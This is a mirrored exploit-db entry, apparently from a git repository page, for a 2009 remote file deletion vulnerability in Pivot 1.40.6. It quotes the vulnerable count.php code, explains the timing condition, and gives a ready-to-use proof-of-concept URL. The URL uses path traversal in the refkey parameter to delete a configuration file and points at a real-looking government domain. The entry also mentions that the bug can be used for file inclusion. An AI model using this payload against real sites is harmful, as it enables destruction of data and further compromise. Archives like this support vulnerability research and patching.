bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/8239.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

69 lines
1.6 KiB
Text
Executable file
Raw Blame History

Pivot 1.40.6 Remote File Delete
Alfons Luja
Vuln :
extensions/bbclone_tools/hr_conf.php line 20
...
$bbclone_debug = false; //is never change
...
=========================================================
extensions/bbclone_tools/count.php
...
if ( ($_GET["refkey"]!="") && file_exists("$refkeydir/".$_GET["refkey"])) { [1]
if ($bbclone_debug==true) { echo "Refkey found..<br />"; }
// Getting the time offset between the web and file server (if there is any)
$offset = timediffwebfile($bbclone_debug);
if ((time() - filectime("$refkeydir/".$_GET["refkey"])) < (1000+$offset)) { [2]
include("do_count.php");
if ($bbclone_debug!=true) {
header("content-type:image/gif");
readfile("pixel.gif");
} else {
echo "Counted normally";
}
die();
} else if ($bbclone_debug==true) {
echo "too old!";
}
if ($bbclone_debug!=true) { [3]
unlink("$refkeydir/".$_GET["refkey"]);
}
}
...
1] . We can put existent file
2] . Time dependences
If current time - last modification time < 1000 + $offset (usually 1001,1002 not more)
We must wait a moment other way 'exploit dosent work'
3] . $bbclone_debug is always false so if condition from point [2] == false
We can delete some file
If register globals is ON we can using this bug to include some file
poc :
http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php
# milw0rm.com [2009-03-18]
Reference in a new issue View git blame Copy permalink